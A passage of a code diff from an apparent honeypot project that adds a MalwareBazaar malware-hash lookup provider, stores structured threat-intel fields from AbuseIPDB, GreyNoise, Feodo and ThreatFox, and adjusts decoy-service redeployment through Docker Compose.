||||||
|
async def _update_topology_service_config(
|
||||||
|
repo: BaseRepository,
|
||||||
|
topology_id: str,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
validated: dict,
|
||||||
|
*,
|
||||||
|
apply: bool,
|
||||||
|
) -> None:
|
||||||
|
decky = await _topology_decky(repo, topology_id, decky_name)
|
||||||
|
if service_name not in (decky.get("services") or []):
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} not on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
cfg_blob = dict(decky.get("decky_config") or {})
|
||||||
|
sc = dict(cfg_blob.get("service_config") or {})
|
||||||
|
sc[service_name] = validated
|
||||||
|
cfg_blob["service_config"] = sc
|
||||||
|
await repo.update_topology_decky(decky["uuid"], {"decky_config": cfg_blob})
|
||||||
|
compose_path = await _rerender_topology_compose(repo, topology_id)
|
||||||
|
if apply:
|
||||||
|
if await _topology_is_agent_pinned(repo, topology_id):
|
||||||
|
await _resync_agent_topology(repo, topology_id)
|
||||||
|
else:
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose(
|
||||||
|
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
|
||||||
|
compose_file=compose_path,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _update_fleet_service_config(
|
||||||
|
repo: BaseRepository,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
validated: dict,
|
||||||
|
*,
|
||||||
|
apply: bool,
|
||||||
|
) -> None:
|
||||||
|
config, compose_path = _fleet_state_or_raise()
|
||||||
|
decky = _fleet_find_decky(config, decky_name)
|
||||||
|
if service_name not in (decky.services or []):
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} not on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
sc = dict(getattr(decky, "service_config", None) or {})
|
||||||
|
sc[service_name] = validated
|
||||||
|
decky.service_config = sc
|
||||||
|
_save_state(config, compose_path)
|
||||||
|
_write_compose(config, compose_path)
|
||||||
|
from decnet.web.db.models import LOCAL_HOST_SENTINEL
|
||||||
|
await repo.upsert_fleet_decky({
|
||||||
|
"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
|
||||||
|
"name": decky.name,
|
||||||
|
"services": list(decky.services or []),
|
||||||
|
"decky_config": decky.model_dump(mode="json"),
|
||||||
|
"decky_ip": decky.ip,
|
||||||
|
"state": "running",
|
||||||
|
})
|
||||||
|
if apply:
|
||||||
|
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
|
||||||
|
if swarm_host_uuid:
|
||||||
|
await _redispatch_fleet_shard(repo, swarm_host_uuid)
|
||||||
|
else:
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
# Docker Compose tracks the previous container by ID. If that
|
||||||
|
# container was already removed (or renamed during a prior failed
|
||||||
|
# deploy), --force-recreate fails with "No such container". Pre-
|
||||||
|
# remove by name so Compose starts from a clean slate.
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: subprocess.run( # nosec B603 B607
|
||||||
|
["docker", "rm", "-f", target],
|
||||||
|
capture_output=True,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose(
|
||||||
|
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
|
||||||
|
compose_file=compose_path,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def remove_service(
|
||||||
|
repo: BaseRepository,
|
||||||
|
*,
|
||||||
|
decky_kind: DeckyKind,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
topology_id: Optional[str] = None,
|
||||||
|
) -> list[str]:
|
||||||
|
"""Remove *service_name* from a deployed decky.
|
||||||
|
|
||||||
|
Stops + removes the service container, persists the new services
|
||||||
|
list, re-renders the compose file (so the next ``up -d`` doesn't
|
||||||
|
bring it back), and publishes ``decky.<name>.service.removed``.
|
||||||
|
|
||||||
|
Returns the post-mutation services list.
|
||||||
|
"""
|
||||||
|
if decky_kind == "topology":
|
||||||
|
if not topology_id:
|
||||||
|
raise ServiceMutationError(
|
||||||
|
"decky_kind=topology requires topology_id",
|
||||||
|
)
|
||||||
|
services = await _remove_topology_service(
|
||||||
|
repo, topology_id, decky_name, service_name,
|
||||||
|
)
|
||||||
|
elif decky_kind == "fleet":
|
||||||
|
services = await _remove_fleet_service(repo, decky_name, service_name)
|
||||||
|
else: # pragma: no cover
|
||||||
|
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
|
||||||
|
|
||||||
|
await _publish(
|
||||||
|
topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED),
|
||||||
|
{
|
||||||
|
"decky_name": decky_name,
|
||||||
|
"service_name": service_name,
|
||||||
|
"topology_id": topology_id,
|
||||||
|
"services": services,
|
||||||
|
},
|
||||||
|
)
|
||||||
|
log.info(
|
||||||
|
"services_live.remove decky=%s topology=%s service=%s",
|
||||||
|
decky_name, topology_id, service_name,
|
||||||
|
)
|
||||||
|
return services
|
||||||
@@ -91,7 +91,7 @@ DECNET_API_PORT: int = _port("DECNET_API_PORT", 8000)
|
|||||||
# DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
|
# DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
|
||||||
# updater / swarmctl subcommands (which never touch auth) can start without
|
# updater / swarmctl subcommands (which never touch auth) can start without
|
||||||
# the master's JWT secret being present in the environment.
|
# the master's JWT secret being present in the environment.
|
||||||
DECNET_INGEST_LOG_FILE: str | None = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
|
DECNET_INGEST_LOG_FILE: str = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
|
||||||
|
|
||||||
# Agent-side RFC 5424 sink written by decnet.collector.worker when run on
|
# Agent-side RFC 5424 sink written by decnet.collector.worker when run on
|
||||||
# a SWARM worker. The forwarder tails this file and ships lines over
|
# a SWARM worker. The forwarder tails this file and ships lines over
|
||||||
@@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
|
|||||||
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
|
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
|
||||||
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
|
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
|
||||||
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
|
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
|
||||||
|
# Bind address for the master-side swarm controller. Loopback by default —
|
||||||
|
# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
|
||||||
|
# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
|
||||||
|
# swarmctl-host in /etc/decnet/decnet.ini.
|
||||||
|
DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
|
||||||
|
|
||||||
# Ingester batching: how many log rows to accumulate per commit, and the
|
# Ingester batching: how many log rows to accumulate per commit, and the
|
||||||
# max wait (ms) before flushing a partial batch. Larger batches reduce
|
# max wait (ms) before flushing a partial batch. Larger batches reduce
|
||||||
|
|||||||
@@ -128,8 +128,6 @@ async def reconcile_once(
|
|||||||
container_states = await asyncio.to_thread(
|
container_states = await asyncio.to_thread(
|
||||||
_collect_container_states, docker_client_factory,
|
_collect_container_states, docker_client_factory,
|
||||||
)
|
)
|
||||||
docker_known = container_states is not None
|
|
||||||
|
|
||||||
json_names = {d.name for d in json_deckies}
|
json_names = {d.name for d in json_deckies}
|
||||||
|
|
||||||
# 1. INSERT: present in JSON, absent from DB.
|
# 1. INSERT: present in JSON, absent from DB.
|
||||||
@@ -138,7 +136,7 @@ async def reconcile_once(
|
|||||||
continue
|
continue
|
||||||
new_state = (
|
new_state = (
|
||||||
_aggregate_decky_state(d.name, list(d.services), container_states)
|
_aggregate_decky_state(d.name, list(d.services), container_states)
|
||||||
if docker_known else "running"
|
if container_states is not None else "running"
|
||||||
)
|
)
|
||||||
row_host = d.host_uuid or host_uuid
|
row_host = d.host_uuid or host_uuid
|
||||||
await repo.upsert_fleet_decky({
|
await repo.upsert_fleet_decky({
|
||||||
@@ -168,7 +166,7 @@ async def reconcile_once(
|
|||||||
)
|
)
|
||||||
|
|
||||||
# 3. STATE: present in both, docker says something fresh.
|
# 3. STATE: present in both, docker says something fresh.
|
||||||
if docker_known:
|
if container_states is not None:
|
||||||
for d in json_deckies:
|
for d in json_deckies:
|
||||||
existing = db_by_name.get(d.name)
|
existing = db_by_name.get(d.name)
|
||||||
if existing is None:
|
if existing is None:
|
||||||
|
|||||||
@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
|
|||||||
from decnet.geoip.lookup import Lookup
|
from decnet.geoip.lookup import Lookup
|
||||||
from decnet.geoip.paths import ensure_root
|
from decnet.geoip.paths import ensure_root
|
||||||
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
|
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
|
||||||
from decnet.geoip.rir.parse import parse_file
|
from decnet.geoip.rir.parse import Range, parse_file
|
||||||
|
|
||||||
logger = logging.getLogger("decnet.geoip.rir.provider")
|
logger = logging.getLogger("decnet.geoip.rir.provider")
|
||||||
|
|
||||||
@@ -45,7 +45,7 @@ class RirProvider(Provider):
|
|||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
|
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
|
||||||
|
|
||||||
ranges = []
|
ranges: list[Range] = []
|
||||||
for path in self.data_paths():
|
for path in self.data_paths():
|
||||||
if not path.exists():
|
if not path.exists():
|
||||||
continue
|
continue
|
||||||
|
|||||||
@@ -17,7 +17,6 @@ later if operators report drift.
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import json
|
|
||||||
import os
|
import os
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Optional
|
from typing import Optional
|
||||||
@@ -93,12 +92,25 @@ class AbuseIPDBProvider(IntelProvider):
|
|||||||
data = payload.get("data") or {}
|
data = payload.get("data") or {}
|
||||||
score = int(data.get("abuseConfidenceScore") or 0)
|
score = int(data.get("abuseConfidenceScore") or 0)
|
||||||
verdict = _score_to_verdict(score)
|
verdict = _score_to_verdict(score)
|
||||||
|
# AbuseIPDB returns ``data.reports[*].categories`` — a list of
|
||||||
|
# int codes per report. Flatten the union across all recent
|
||||||
|
# reports so the IntelLifter sees the full activity profile,
|
||||||
|
# not just the most-recent report's categories. Sorted for
|
||||||
|
# determinism (matters for tests + for the bus payload diff).
|
||||||
|
categories: set[int] = set()
|
||||||
|
for report in data.get("reports") or []:
|
||||||
|
if not isinstance(report, dict):
|
||||||
|
continue
|
||||||
|
for cat in report.get("categories") or []:
|
||||||
|
if isinstance(cat, int):
|
||||||
|
categories.add(cat)
|
||||||
return IntelResult(
|
return IntelResult(
|
||||||
provider=self.name,
|
provider=self.name,
|
||||||
verdict=verdict,
|
verdict=verdict,
|
||||||
column_updates={
|
column_updates={
|
||||||
"abuseipdb_score": score,
|
"abuseipdb_score": score,
|
||||||
"abuseipdb_raw": json.dumps(data),
|
"abuseipdb_categories": sorted(categories),
|
||||||
|
"abuseipdb_raw": data,
|
||||||
"abuseipdb_queried_at": datetime.now(timezone.utc),
|
"abuseipdb_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
|||||||
@@ -78,3 +78,33 @@ class IntelProvider(ABC):
|
|||||||
entire IP. Implementations should also respect
|
entire IP. Implementations should also respect
|
||||||
``self._semaphore`` to bound in-flight calls.
|
``self._semaphore`` to bound in-flight calls.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
class MalHashProvider(ABC):
|
||||||
|
"""Abstract bad-hash lookup provider.
|
||||||
|
|
||||||
|
Sibling to :class:`IntelProvider` — different keyspace (file SHA-256
|
||||||
|
vs IP), different consumer (the email ingester at observation time,
|
||||||
|
not the IP-keyed intel-worker fan-out). Kept as a separate ABC so
|
||||||
|
the ``lookup(ip)`` semantics on ``IntelProvider`` stay honest.
|
||||||
|
|
||||||
|
Concrete impls today:
|
||||||
|
|
||||||
|
* :class:`decnet.intel.mal_hash.MalwareBazaarProvider` — bulk-feed
|
||||||
|
shape mirroring :class:`decnet.intel.feodo.FeodoProvider`.
|
||||||
|
|
||||||
|
Future impls (paid VirusTotal subscription, in-house allowlist) plug
|
||||||
|
in behind the same factory in :func:`decnet.intel.factory.get_mal_hash_provider`.
|
||||||
|
"""
|
||||||
|
|
||||||
|
name: str
|
||||||
|
|
||||||
|
@abstractmethod
|
||||||
|
async def is_known_bad(self, sha256: str) -> bool:
|
||||||
|
"""Return whether *sha256* is on this provider's bad-hash list.
|
||||||
|
|
||||||
|
MUST NOT raise — return ``False`` on any error (the caller is the
|
||||||
|
ingester, not a worker; an exception here would taint a totally
|
||||||
|
unrelated bus payload). The provider is responsible for logging
|
||||||
|
its own errors.
|
||||||
|
"""
|
||||||
|
|||||||
@@ -21,7 +21,7 @@ from __future__ import annotations
|
|||||||
import os
|
import os
|
||||||
from typing import List
|
from typing import List
|
||||||
|
|
||||||
from decnet.intel.base import IntelProvider
|
from decnet.intel.base import IntelProvider, MalHashProvider
|
||||||
|
|
||||||
_KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")
|
_KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")
|
||||||
|
|
||||||
@@ -37,6 +37,40 @@ def _provider_list() -> list[str]:
|
|||||||
return [p.strip().lower() for p in raw.split(",") if p.strip()]
|
return [p.strip().lower() for p in raw.split(",") if p.strip()]
|
||||||
|
|
||||||
|
|
||||||
|
_mal_hash_singleton: MalHashProvider | None = None
|
||||||
|
_mal_hash_initialized: bool = False
|
||||||
|
|
||||||
|
|
||||||
|
def get_mal_hash_provider() -> MalHashProvider | None:
|
||||||
|
"""Return the configured malware-hash lookup provider singleton.
|
||||||
|
|
||||||
|
Sibling factory to :func:`get_intel_providers` — different keyspace
|
||||||
|
(file SHA-256 vs IP), different consumer (the email ingester at
|
||||||
|
observation time, not the IP-keyed intel-worker fan-out). Returns
|
||||||
|
``None`` only if intel is disabled wholesale; otherwise returns a
|
||||||
|
provider whose :meth:`is_known_bad` self-disables to a no-op when
|
||||||
|
``DECNET_MALWAREBAZAAR_AUTH_KEY`` is unset, so the ingester never
|
||||||
|
has to special-case "no provider configured."
|
||||||
|
"""
|
||||||
|
global _mal_hash_singleton, _mal_hash_initialized
|
||||||
|
if _mal_hash_initialized:
|
||||||
|
return _mal_hash_singleton
|
||||||
|
_mal_hash_initialized = True
|
||||||
|
if not _enabled():
|
||||||
|
_mal_hash_singleton = None
|
||||||
|
return None
|
||||||
|
from decnet.intel.mal_hash import MalwareBazaarProvider
|
||||||
|
_mal_hash_singleton = MalwareBazaarProvider()
|
||||||
|
return _mal_hash_singleton
|
||||||
|
|
||||||
|
|
||||||
|
def _reset_mal_hash_provider_for_testing() -> None:
|
||||||
|
"""Test hook — drop the singleton so the next call re-reads env."""
|
||||||
|
global _mal_hash_singleton, _mal_hash_initialized
|
||||||
|
_mal_hash_singleton = None
|
||||||
|
_mal_hash_initialized = False
|
||||||
|
|
||||||
|
|
||||||
def get_intel_providers() -> List[IntelProvider]:
|
def get_intel_providers() -> List[IntelProvider]:
|
||||||
"""Return the configured threat-intel providers.
|
"""Return the configured threat-intel providers.
|
||||||
|
|
||||||
|
|||||||
@@ -13,7 +13,6 @@ of attacker IPs map to a single network round-trip per refresh window.
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import json
|
|
||||||
import time
|
import time
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -93,16 +92,22 @@ class FeodoProvider(IntelProvider):
|
|||||||
verdict=None, # absence ≠ "benign", let other providers speak
|
verdict=None, # absence ≠ "benign", let other providers speak
|
||||||
column_updates={
|
column_updates={
|
||||||
"feodo_listed": False,
|
"feodo_listed": False,
|
||||||
"feodo_raw": "{}",
|
"feodo_malware_family": None,
|
||||||
|
"feodo_raw": {},
|
||||||
"feodo_queried_at": datetime.now(timezone.utc),
|
"feodo_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
family_obj = entry.get("malware")
|
||||||
|
family = (
|
||||||
|
family_obj if isinstance(family_obj, str) and family_obj else None
|
||||||
|
)
|
||||||
return IntelResult(
|
return IntelResult(
|
||||||
provider=self.name,
|
provider=self.name,
|
||||||
verdict="malicious",
|
verdict="malicious",
|
||||||
column_updates={
|
column_updates={
|
||||||
"feodo_listed": True,
|
"feodo_listed": True,
|
||||||
"feodo_raw": json.dumps(entry),
|
"feodo_malware_family": family,
|
||||||
|
"feodo_raw": entry,
|
||||||
"feodo_queried_at": datetime.now(timezone.utc),
|
"feodo_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
|||||||
@@ -25,7 +25,6 @@ Status code semantics:
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import json
|
|
||||||
import os
|
import os
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Optional
|
from typing import Optional
|
||||||
@@ -71,7 +70,9 @@ class GreyNoiseProvider(IntelProvider):
|
|||||||
verdict="unknown",
|
verdict="unknown",
|
||||||
column_updates={
|
column_updates={
|
||||||
"greynoise_classification": "unknown",
|
"greynoise_classification": "unknown",
|
||||||
"greynoise_raw": json.dumps({"message": "not seen"}),
|
"greynoise_name": None,
|
||||||
|
"greynoise_tags": [],
|
||||||
|
"greynoise_raw": {"message": "not seen"},
|
||||||
"greynoise_queried_at": datetime.now(timezone.utc),
|
"greynoise_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
@@ -88,12 +89,25 @@ class GreyNoiseProvider(IntelProvider):
|
|||||||
|
|
||||||
classification = (data.get("classification") or "unknown").lower()
|
classification = (data.get("classification") or "unknown").lower()
|
||||||
verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
|
verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
|
||||||
|
# The Community endpoint surfaces an actor ``name`` (e.g. "Tor",
|
||||||
|
# "Censys") but no behavioral tag list — the tag taxonomy is
|
||||||
|
# paid-tier only. Persist whatever we got; a future non-Community
|
||||||
|
# provider may populate ``greynoise_tags``.
|
||||||
|
name_obj = data.get("name")
|
||||||
|
name = name_obj if isinstance(name_obj, str) and name_obj else None
|
||||||
|
tags_obj = data.get("tags")
|
||||||
|
tags: list[str] = (
|
||||||
|
[t for t in tags_obj if isinstance(t, str)]
|
||||||
|
if isinstance(tags_obj, list) else []
|
||||||
|
)
|
||||||
return IntelResult(
|
return IntelResult(
|
||||||
provider=self.name,
|
provider=self.name,
|
||||||
verdict=verdict,
|
verdict=verdict,
|
||||||
column_updates={
|
column_updates={
|
||||||
"greynoise_classification": classification,
|
"greynoise_classification": classification,
|
||||||
"greynoise_raw": json.dumps(data),
|
"greynoise_name": name,
|
||||||
|
"greynoise_tags": tags,
|
||||||
|
"greynoise_raw": data,
|
||||||
"greynoise_queried_at": datetime.now(timezone.utc),
|
"greynoise_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
|||||||
195
decnet/intel/mal_hash.py
Normal file
195
decnet/intel/mal_hash.py
Normal file
@@ -0,0 +1,195 @@
|
|||||||
|
"""MalwareBazaar bad-hash provider — bulk SHA-256 feed.
|
||||||
|
|
||||||
|
Mirrors :mod:`decnet.intel.feodo` for the refresh / TTL / set-membership
|
||||||
|
shape, but operates on the SHA-256 keyspace instead of IPs and so
|
||||||
|
implements :class:`decnet.intel.base.MalHashProvider` rather than
|
||||||
|
:class:`IntelProvider`. Keep the two ABCs disjoint — see ``base.py``.
|
||||||
|
|
||||||
|
Endpoint: ``GET https://bazaar.abuse.ch/export/csv/full/`` with
|
||||||
|
``Auth-Key: <key>`` header. Returns a ZIP'd CSV with one row per
|
||||||
|
sample; the ``sha256_hash`` column is the natural key. ~900K rows ≈
|
||||||
|
30 MB resident as a ``set[str]`` of hex-lowercased hashes.
|
||||||
|
|
||||||
|
Auth-key is read from ``DECNET_MALWAREBAZAAR_AUTH_KEY``. When unset,
|
||||||
|
the provider logs one warning at first refresh attempt and disables
|
||||||
|
itself for the process lifetime — :meth:`is_known_bad` returns ``False``
|
||||||
|
without ever making a network call. The ingester treats that the same
|
||||||
|
as "no opinion," so R0046's ``mal_hash_match`` lane stays absent on the
|
||||||
|
bus payload (which is exactly what the predicate's ``is True`` check
|
||||||
|
does today, so the silent-no-op is behaviorally identical to "lane not
|
||||||
|
shipped yet").
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import csv
|
||||||
|
import io
|
||||||
|
import os
|
||||||
|
import time
|
||||||
|
import zipfile
|
||||||
|
from typing import Optional
|
||||||
|
|
||||||
|
from decnet.intel.base import MalHashProvider
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
from decnet.net.http import stealth_client
|
||||||
|
|
||||||
|
log = get_logger("intel.mal_hash")
|
||||||
|
|
||||||
|
_ENDPOINT = "https://bazaar.abuse.ch/export/csv/full/"
|
||||||
|
_DEFAULT_REFRESH_S = 86_400.0 # 24h — feed is daily, no need to hammer
|
||||||
|
_AUTH_KEY_ENV = "DECNET_MALWAREBAZAAR_AUTH_KEY"
|
||||||
|
_REFRESH_INTERVAL_ENV = "DECNET_MAL_HASH_REFRESH_INTERVAL_S"
|
||||||
|
|
||||||
|
|
||||||
|
def _read_refresh_interval() -> float:
|
||||||
|
raw = os.environ.get(_REFRESH_INTERVAL_ENV)
|
||||||
|
if raw is None:
|
||||||
|
return _DEFAULT_REFRESH_S
|
||||||
|
try:
|
||||||
|
return float(raw)
|
||||||
|
except ValueError:
|
||||||
|
log.warning(
|
||||||
|
"%s=%r not a float; falling back to default %.0f",
|
||||||
|
_REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
|
||||||
|
)
|
||||||
|
return _DEFAULT_REFRESH_S
|
||||||
|
|
||||||
|
|
||||||
|
class MalwareBazaarProvider(MalHashProvider):
|
||||||
|
"""Bulk SHA-256 lookup against MalwareBazaar's full export."""
|
||||||
|
|
||||||
|
name = "malwarebazaar"
|
||||||
|
|
||||||
|
def __init__(
|
||||||
|
self,
|
||||||
|
*,
|
||||||
|
auth_key: Optional[str] = None,
|
||||||
|
refresh_interval_s: Optional[float] = None,
|
||||||
|
) -> None:
|
||||||
|
self._auth_key = auth_key or os.environ.get(_AUTH_KEY_ENV) or None
|
||||||
|
self._refresh_interval_s = (
|
||||||
|
refresh_interval_s
|
||||||
|
if refresh_interval_s is not None
|
||||||
|
else _read_refresh_interval()
|
||||||
|
)
|
||||||
|
self._known: set[str] = set()
|
||||||
|
self._loaded_at: float = 0.0
|
||||||
|
self._last_error: Optional[str] = None
|
||||||
|
self._disabled_warned: bool = False
|
||||||
|
|
||||||
|
@property
|
||||||
|
def disabled(self) -> bool:
|
||||||
|
return self._auth_key is None
|
||||||
|
|
||||||
|
async def _refresh(self) -> Optional[str]:
|
||||||
|
"""Refetch the bulk feed. Returns an error string or ``None``."""
|
||||||
|
if self._auth_key is None:
|
||||||
|
return "no auth key"
|
||||||
|
try:
|
||||||
|
async with stealth_client(timeout=60.0) as client:
|
||||||
|
resp = await client.get(
|
||||||
|
_ENDPOINT, headers={"Auth-Key": self._auth_key},
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
return f"network: {exc}"
|
||||||
|
if resp.status_code != 200:
|
||||||
|
return f"HTTP {resp.status_code}"
|
||||||
|
body = resp.content
|
||||||
|
try:
|
||||||
|
new_known = _parse_dump(body)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
return f"parse: {exc}"
|
||||||
|
if not new_known:
|
||||||
|
return "feed: empty"
|
||||||
|
self._known = new_known
|
||||||
|
self._loaded_at = time.monotonic()
|
||||||
|
self._last_error = None
|
||||||
|
log.info("malwarebazaar: refreshed bulk feed entries=%d", len(new_known))
|
||||||
|
return None
|
||||||
|
|
||||||
|
async def _ensure_fresh(self) -> None:
|
||||||
|
if self.disabled:
|
||||||
|
if not self._disabled_warned:
|
||||||
|
log.warning(
|
||||||
|
"R0046 mal_hash_match disabled: %s unset",
|
||||||
|
_AUTH_KEY_ENV,
|
||||||
|
)
|
||||||
|
self._disabled_warned = True
|
||||||
|
return
|
||||||
|
if (
|
||||||
|
not self._known
|
||||||
|
or (time.monotonic() - self._loaded_at) >= self._refresh_interval_s
|
||||||
|
):
|
||||||
|
err = await self._refresh()
|
||||||
|
if err:
|
||||||
|
self._last_error = err
|
||||||
|
log.warning("malwarebazaar refresh failed: %s", err)
|
||||||
|
|
||||||
|
async def is_known_bad(self, sha256: str) -> bool:
|
||||||
|
if self.disabled:
|
||||||
|
return False
|
||||||
|
try:
|
||||||
|
await self._ensure_fresh()
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
# Belt and braces: _ensure_fresh swallows refresh failures
|
||||||
|
# but a bug in there shouldn't blow up the ingester payload.
|
||||||
|
log.exception("malwarebazaar refresh raised: %s", exc)
|
||||||
|
return False
|
||||||
|
return sha256.lower() in self._known
|
||||||
|
|
||||||
|
|
||||||
|
def _parse_dump(body: bytes) -> set[str]:
|
||||||
|
"""Extract SHA-256 hashes from MalwareBazaar's full dump.
|
||||||
|
|
||||||
|
The endpoint returns a ZIP archive containing a single CSV with a
|
||||||
|
``sha256_hash`` column. Some abuse.ch flavours of the same feed
|
||||||
|
family ship plain CSV instead — handle both by sniffing the magic
|
||||||
|
bytes. Hashes are lowercased; non-hex / wrong-length values are
|
||||||
|
dropped (defense in depth — we set-membership-test by exact match).
|
||||||
|
"""
|
||||||
|
if body[:2] == b"PK":
|
||||||
|
with zipfile.ZipFile(io.BytesIO(body)) as zf:
|
||||||
|
csv_names = [n for n in zf.namelist() if n.lower().endswith(".csv")]
|
||||||
|
if not csv_names:
|
||||||
|
raise ValueError("zip has no .csv member")
|
||||||
|
with zf.open(csv_names[0]) as fh:
|
||||||
|
csv_bytes = fh.read()
|
||||||
|
else:
|
||||||
|
csv_bytes = body
|
||||||
|
text = csv_bytes.decode("utf-8", errors="replace")
|
||||||
|
return _extract_hashes(text)
|
||||||
|
|
||||||
|
|
||||||
|
def _extract_hashes(text: str) -> set[str]:
|
||||||
|
"""Pull the ``sha256_hash`` column out of MalwareBazaar's CSV.
|
||||||
|
|
||||||
|
The dump prefaces the table with ``#``-prefixed comment lines.
|
||||||
|
Skip those, find the header row, locate the column, then read the
|
||||||
|
rest. csv.reader handles the quoting (the ``signature`` column
|
||||||
|
contains commas and is properly quoted in the dump).
|
||||||
|
"""
|
||||||
|
body_lines = [
|
||||||
|
line for line in text.splitlines()
|
||||||
|
if line and not line.lstrip().startswith("#")
|
||||||
|
]
|
||||||
|
if not body_lines:
|
||||||
|
return set()
|
||||||
|
reader = csv.reader(body_lines)
|
||||||
|
header = next(reader, None)
|
||||||
|
if not header:
|
||||||
|
return set()
|
||||||
|
norm = [h.strip().strip('"').lower() for h in header]
|
||||||
|
try:
|
||||||
|
col = norm.index("sha256_hash")
|
||||||
|
except ValueError:
|
||||||
|
# Fallback — first column is sha256 in every documented
|
||||||
|
# variant; if the header naming changes upstream we still
|
||||||
|
# capture something rather than silently emptying the set.
|
||||||
|
col = 0
|
||||||
|
out: set[str] = set()
|
||||||
|
for row in reader:
|
||||||
|
if len(row) <= col:
|
||||||
|
continue
|
||||||
|
cell = row[col].strip().strip('"').lower()
|
||||||
|
if len(cell) == 64 and all(c in "0123456789abcdef" for c in cell):
|
||||||
|
out.add(cell)
|
||||||
|
return out
|
||||||
@@ -12,7 +12,6 @@ caps requests/min — the provider works either way.
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import json
|
|
||||||
import os
|
import os
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Optional
|
from typing import Optional
|
||||||
@@ -71,7 +70,10 @@ class ThreatFoxProvider(IntelProvider):
|
|||||||
verdict=None, # absence is not a benign signal
|
verdict=None, # absence is not a benign signal
|
||||||
column_updates={
|
column_updates={
|
||||||
"threatfox_listed": False,
|
"threatfox_listed": False,
|
||||||
"threatfox_raw": "{}",
|
"threatfox_threat_types": [],
|
||||||
|
"threatfox_ioc_types": [],
|
||||||
|
"threatfox_malware_families": [],
|
||||||
|
"threatfox_raw": {},
|
||||||
"threatfox_queried_at": datetime.now(timezone.utc),
|
"threatfox_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
@@ -83,12 +85,37 @@ class ThreatFoxProvider(IntelProvider):
|
|||||||
|
|
||||||
data = payload.get("data") or []
|
data = payload.get("data") or []
|
||||||
listed = bool(data)
|
listed = bool(data)
|
||||||
|
